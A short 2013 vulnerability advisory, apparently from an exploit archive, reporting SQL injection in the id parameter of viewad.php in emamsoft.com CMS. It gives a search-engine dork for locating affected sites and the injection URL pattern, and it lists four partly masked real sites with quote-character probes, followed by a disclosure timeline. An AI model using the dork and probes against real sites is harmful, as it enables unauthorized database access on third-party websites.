####################################################### # Exploit Title : emamsoft.com CMS SQL injection vulnerability # Exploit Author : Ashiyane Digital Security Team # Vendor Home : http://www.emamsoft.com/ # Date : 2013/7/31 # Dork : intext:"Powerd By emamsoft.com" # AVN : ASH-2013-134 ####################################################### # Vulnerability Detail : # the id parameter in viewad.php page is vulnerable to SQLi # attack. # http://[site]/viewad.php?id=[SQL] ####################################################### #Demo: # # http://aqaar.emXoft.net/viewad.php?id=20%27 # # http://www.eleXad.com/viewad.php?id=107%27 # # http://www.farXna.com/viewad.php?id=7%27 # # http://www.3Xark.com/viewad.php?id=17%27 # ####################################################### # TimeLine : 2013/7/31 - vulnerability discovered # 2013/7/31 - vendor notified # 2013/7/31 - vendor replied about fixing # 2013/8/01 - vulnerability disclosed ####################################################### # Greetz To My Lord Allah # Discovered by AbolfazlKHAAN # # Spc Tnx To : PrinceofHacking , C4t , HamidX9 , Milad Hacking and all Ashiyane Researchers ... #######################################################